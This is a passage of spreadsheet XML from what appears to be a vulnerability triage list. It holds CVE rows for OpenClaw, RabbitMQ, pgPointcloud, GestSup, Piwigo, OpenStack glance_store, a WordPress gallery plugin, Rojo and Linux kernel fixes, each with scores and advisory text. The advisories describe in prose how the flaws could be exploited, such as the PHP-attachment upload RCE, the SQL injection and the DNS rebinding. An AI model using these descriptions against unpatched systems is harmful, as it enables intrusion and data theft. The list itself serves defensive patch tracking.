        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100567</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>OpenClaw is an agent gateway distributed as the npm package 'openclaw'. In versions &gt;= 2026.4.5 and &lt; 2026.8.1, the Gateway validated a single DNS resolution result for a configured remote Chrome DevTools Protocol (CDP) hostname, but the raw WebSocket and Playwright transports performed a later, independent DNS resolution, discarding the DNS pinning enforced at validation time. An attacker who controls an approved CDP hostname or its DNS answers can exploit this check-then-use gap via DNS rebinding to make the Gateway connect to a loopback, private, link-local, cloud metadata, or other SSRF-policy-denied address. The impact depends on the remote CDP configuration, DNS timing, and the services reachable from the Gateway host. The issue is fixed in 2026.8.1; as a mitigation, disable hostname-based remote CDP endpoints or restrict them to trusted, stable infrastructure.</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100567</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67236</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.2.8 and 4.3.2, a successful POST /login caused is_authorized/2 to set an auth cookie containing base64-encoded username:password credentials without HttpOnly, Secure, SameSite, or expiration protections. Because base64 is encoding rather than encryption, an attacker with same-origin cross-site scripting, an HTTP-readable network position, or local access to the browser cookie store could recover the actual login credentials; older browsers that treated an absent SameSite attribute as None also sent the cookie cross-site. This issue is fixed in versions 4.2.8 and 4.3.2.</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67236</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67409</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E35" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F35" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G35" s="5" t="inlineStr"/>
      <c r="H35" s="5" t="inlineStr"/>
      <c r="I35" s="5" t="inlineStr"/>
      <c r="J35" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K35" s="5" t="inlineStr"/>
      <c r="L35" s="5" t="inlineStr"/>
      <c r="M35" s="5" t="inlineStr"/>
      <c r="N35" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O35" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-252</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 3.13.0 until 4.3.3, 4.2.9, 4.1.14, 4.0.23, and 3.13.18, JWKS Fetch Ignores HTTP Response Status Code - Signing Key Destruction Causes Authentication DoS (CWE-252). the JWKS key fetching mechanism in uaajwt.erl does not validate the HTTP response status code when downloading signing keys from the OAuth2 provider's JWKS endpoint. Non-200 responses (including 4xx and 5xx errors) are processed identically to successful responses. When the JWKS endpoint returns an error response with a valid-JSON body that lacks a keys field, all previously cached signing keys are destroyed, causing a persistent authentication denial of Files: deps/rabbitmqauthbackendoauth2/src/uaajwt.erl, lines 50-63 deps/rabbitmqauthbackendoauth2/src/uaajwks.erl, lines 5-7 deps/rabbitmqauthbackendoauth2/src/rabbitoauth2provider.erl, lines 98-107 Bug 1: HTTP status code ignored (uaajwt.erl:50-63): The Erlang httpc module returns {ok, {{HttpVersion, StatusCode, ReasonPhrase}, Headers, Body}}. The pattern {ok, {, , JwksBody}} matches ANY successful HTTP transaction Persistent authentication DoS: Once keys are destroyed, ALL OAuth2/JWT authentication fails for all users until a new successful JWKS refresh occurs Amplification: A single attacker can deny access to all legitimate OAuth2 users across the entire RabbitMQ. This issue is fixed in versions 4.3.3, 4.2.9, 4.1.14, 4.0.23, and 3.13.18.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67409</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67410</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr">
        <is>
          <t>requests, gin</t>
        </is>
      </c>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>RabbitMQ is a messaging and streaming broker. From 4.2.0 until 4.3.3 and 4.2.9, OAuth2 Client Secret Exposed via Unauthenticated JavaScript Endpoint (CWE-200). when OAuth2 authentication is enabled for the RabbitMQ Management UI and the configured flow, IDP use a client secret, the oauthclientsecret configuration value is included in the JavaScript served by the unauthenticated endpoint /js/oidc-oauth/bootstrap.js. Any user who can reach the management UI port can retrieve the OAuth2 client secret without Files: deps/rabbitmqmanagement/src/rabbitmgmtwmauth.erl, line 186 deps/rabbitmqmanagement/src/rabbitmgmtoauthbootstrap.erl, lines 35-50 deps/rabbitmqmanagement/src/rabbitmgmtdispatcher.erl, lines 45-49 (route registration) Code Path: 1. The route /js/oidc-oauth/bootstrap.js is registered as a plain Cowboy handler (rabbitmgmtdispatcher.erl:46): Credential exposure for the affected configuration: OAuth2 client secret is accessible without any authentication Token theft: Attacker can complete the authorization code flow using stolen authorization codes Client impersonation: Attacker can make requests. Any RabbitMQ deployment with: This issue is fixed in versions 4.3.3 and 4.2.9.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67410</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97525</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr"/>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: Allocate split page tables as kernel page tables
A PTE is allocated directly without going through the standard page table
allocation routines (such as pte_alloc_one_kernel()) when the CPA code
splits a large page (__split_large_page()).
This means the page table constructor is never called nor is the page table
marked as a kernel page table.
The former results in the folio associated with the page table not being
marked as a page table (__pagetable_ctor() is never called thus neither is
__folio_set_pgtable()) nor are statistics updated to reflect
it (lruvec_stat_add_folio() is never called).
The latter issue of failing to mark the page table as a kernel page
table (ptdesc_set_kernel() is never called) is far more problematic.
Since commit:
  5ba2f0a15564 ("mm: introduce deferred freeing for kernel page tables")
kernel page table freeing has been batched and since the
subsequent commit:
  e37d5a2d60a3 ("iommu/sva: invalidate stale IOTLB entries for kernel address space")
IOTLB cache entries for kernel page tables have been invalidated upon
being freed.
Since split page tables are freed without this invalidation, the IOTLB
can contain stale entries for them.
Resolve the issue by using the ordinary PTE allocation API at split time.
This results in these kernel page tables invoking a page table constructor,
and thus requires a page table destructor.
Destructors are not always present, like for early allocated direct map
page tables). Conditionally call pagetable_dtor_free() if the PG_table
folio flag for the ptdesc is set, otherwise we free the page table via
pagetable_free().
Regardless of which path is taken page tables marked as kernel page tables,
which now includes split page tables, take the correct route through
pagetable_free_kernel().
There is a user-visible side effect in that split page tables will appear
in nr_page_table_pages in /proc/vmstat (as do other kernel page tables
allocated after early boot), however this is a positive change.
This issue started being markedly problematic after commit:
  5ba2f0a15564 ("mm: introduce deferred freeing for kernel page tables")
so choose this as the Fixes target.
[ dhansen: rephrase in imperative mood ]</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97525</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100387</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>pgPointcloud through 1.2.5 contains a heap out-of-bounds read vulnerability in dimensional patch WKB deserialization that allows authenticated database users to read adjacent heap memory. Attackers can supply crafted pcpatch values with attacker-controlled size fields to copy heap memory into stored patches for exfiltration or crash the PostgreSQL backend.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100387</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100389</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>GestSup versions before 3.2.61 contain a remote code execution vulnerability in the basic IMAP connector's attachment handling that fails to skip blocked file extensions. Unauthenticated attackers can send emails with PHP attachments to monitored mailboxes, which are written to the web-accessible upload/ticket directory and executed when accessed.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100389</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100532</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr">
        <is>
          <t>sap, npm, gin</t>
        </is>
      </c>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
          <t>@openclaw/whatsapp (npm) before 2026.8.1 exposes the WhatsApp login tool through the generic channel-tool path without preserving the originating sender's owner status, so the owner-only tool boundary is not enforced. An admitted non-owner sender able to steer the tool can request a forced login and receive a new QR code for a configured account, disconnecting the Gateway's WhatsApp account and causing loss of availability; full account relinking additionally requires the attacker to scan the returned QR code with another phone. The issue affects the owner-only tool boundary rather than WhatsApp transport authentication. Fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T40" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100532</t>
        </is>
      </c>
    </row>
    <row r="41">
      <c r="A41" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B41" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C41" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44642</t>
        </is>
      </c>
      <c r="D41" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E41" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F41" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G41" s="5" t="inlineStr"/>
      <c r="H41" s="5" t="inlineStr"/>
      <c r="I41" s="5" t="inlineStr"/>
      <c r="J41" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K41" s="5" t="inlineStr"/>
      <c r="L41" s="5" t="inlineStr"/>
      <c r="M41" s="5" t="inlineStr"/>
      <c r="N41" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O41" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P41" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q41" s="5" t="inlineStr"/>
      <c r="R41" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S41" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, check_upgrade_access_rights() in admin/include/functions_upgrade.php conditionally escapes the submitted username only when the removed get_magic_quotes_gpc function exists, so PHP 8 and later concatenate an unauthenticated username directly into the upgrade authentication SQL query. When database upgrades are pending, a crafted query result can satisfy the status and password checks, set PHPWG_IN_UPGRADE, and authorize upgrade execution without valid administrator credentials. This can cause unauthorized database integrity changes and service disruption. This vulnerability is fixed in 16.4.0.</t>
        </is>
      </c>
      <c r="T41" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-44642</t>
        </is>
      </c>
    </row>
    <row r="42">
      <c r="A42" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B42" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C42" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51773</t>
        </is>
      </c>
      <c r="D42" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E42" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F42" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G42" s="5" t="inlineStr"/>
      <c r="H42" s="5" t="inlineStr"/>
      <c r="I42" s="5" t="inlineStr"/>
      <c r="J42" s="5" t="inlineStr">
        <is>
          <t>vmware</t>
        </is>
      </c>
      <c r="K42" s="5" t="inlineStr"/>
      <c r="L42" s="5" t="inlineStr"/>
      <c r="M42" s="5" t="inlineStr"/>
      <c r="N42" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O42" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P42" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q42" s="5" t="inlineStr"/>
      <c r="R42" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S42" s="5" t="inlineStr">
        <is>
          <t>An issue in the VMware datastore driver of OpenStack glance_store. When an authenticated attacker provides a maliciously crafted image location URI pointing to an external server, the _retry_request function fails to validate the destination host before attaching sensitive authentication headers.</t>
        </is>
      </c>
      <c r="T42" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51773</t>
        </is>
      </c>
    </row>
    <row r="43">
      <c r="A43" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B43" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C43" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92713</t>
        </is>
      </c>
      <c r="D43" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E43" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F43" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G43" s="5" t="inlineStr"/>
      <c r="H43" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I43" s="5" t="inlineStr"/>
      <c r="J43" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K43" s="5" t="inlineStr"/>
      <c r="L43" s="5" t="inlineStr"/>
      <c r="M43" s="5" t="inlineStr"/>
      <c r="N43" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O43" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P43" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q43" s="5" t="inlineStr"/>
      <c r="R43" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S43" s="5" t="inlineStr">
        <is>
          <t>The Modula Image Gallery – Photo Grid &amp; Video Gallery plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the upload_image function in all versions up to, and including, 3.0.2. This makes it possible for authenticated attackers, with author-level access and above, to delete arbitrary files on the server. The path restriction to wp-content/uploads is not an effective ownership boundary, as all user attachment files reside within that tree, and Authors trivially satisfy the edit_post check on their own galleries.</t>
        </is>
      </c>
      <c r="T43" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92713</t>
        </is>
      </c>
    </row>
    <row r="44">
      <c r="A44" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B44" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C44" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97875</t>
        </is>
      </c>
      <c r="D44" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E44" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F44" s="5" t="inlineStr">
        <is>
          <t>74b3a70d-cca6-4d34-9789-e83b222ae3be</t>
        </is>
      </c>
      <c r="G44" s="5" t="inlineStr"/>
      <c r="H44" s="5" t="inlineStr"/>
      <c r="I44" s="5" t="inlineStr"/>
      <c r="J44" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K44" s="5" t="inlineStr"/>
      <c r="L44" s="5" t="inlineStr"/>
      <c r="M44" s="5" t="inlineStr"/>
      <c r="N44" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O44" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P44" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q44" s="5" t="inlineStr"/>
      <c r="R44" s="5" t="inlineStr">
        <is>
          <t>CWE-350</t>
        </is>
      </c>
      <c r="S44" s="5" t="inlineStr">
        <is>
          <t>Rojo's "rojo serve" HTTP API (default port 34872) has no Host/Origin header validation, making it vulnerable to DNS rebinding. A malicious webpage can read all project source, write malicious code to files on disk, and launch local programs via opener::open() with no user interaction beyond visiting the page.</t>
        </is>
      </c>
      <c r="T44" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97875</t>
        </is>
      </c>
    </row>
    <row r="45">
      <c r="A45" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B45" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C45" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98069</t>
        </is>
      </c>
      <c r="D45" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E45" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F45" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G45" s="5" t="inlineStr"/>
      <c r="H45" s="5" t="inlineStr"/>
      <c r="I45" s="5" t="inlineStr"/>
      <c r="J45" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="K45" s="5" t="inlineStr"/>
      <c r="L45" s="5" t="inlineStr"/>
      <c r="M45" s="5" t="inlineStr"/>
      <c r="N45" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O45" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P45" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q45" s="5" t="inlineStr"/>
      <c r="R45" s="5" t="inlineStr"/>
      <c r="S45" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net/rds: acquire the fastpath locks in rds_conn_shutdown()
rds_conn_shutdown() quiesces the transmit and receive-refill paths by
waiting for RDS_IN_XMIT and RDS_RECV_REFILL to be sampled clear, and
then runs the transport shutdown and rds_conn_path_reset().  Sampling
the bits clear is not the same as owning them: the moment after the
wait_event() returns, rds_send_xmit() can re-acquire RDS_IN_XMIT (or
rds_ib_recv_refill() can re-acquire RDS_RECV_REFILL) and run
concurrently with the teardown.
The sender does recheck the connection state after taking the lock,
but that recheck is a classic store-buffering pattern: teardown writes
the state and reads the bit while the sender writes the bit and reads
the state.  acquire_in_xmit() is only an acquire operation, so on
weakly ordered architectures both sides can miss each other's write,
and the transmit path then runs while the transport zeroes its rings
(e.g. rds_ib_ring_init()) and rds_send_path_reset() rewrites the
transmit state under it.
Oracle UEK fixed the same class of crashes - a 14-year tail of
BUG_ON()s in rds_ib_sub_signaled(), unexpected op-codes and NULL
dereferences in rds_ib_send_cqe_handler() during failover testing -
by making the teardown path *acquire* the fastpath bit locks instead
of testing them ("rds: Make sure transmit path and connection
tear-down does not run concurrently").  Ownership of a single word is
decided by RMW atomicity, so no cross-variable ordering is needed.
Do the same here: take both locks before calling the transport
shutdown, hold them across rds_conn_path_reset(), and release them
explicitly with a wake-up afterwards.  Both are released with
clear_bit_unlock(), so that the ring re-initialization done by the
transport shutdown and the transmit state rewritten by
rds_send_path_reset() are ordered before either bit is seen clear by
the next acquire_in_xmit() or acquire_refill().
The fastpath users of these bits - rds_send_xmit() and
rds_ib_recv_refill() - are trylock style and back off while teardown
owns the locks, so no new lock dependency is introduced for them.
rds_tcp_reset_callbacks() is different: since the previous patch it
acquires RDS_IN_XMIT as well, and it blocks doing so, so its wait now
spans the teardown instead of at most one send batch.  That waiter
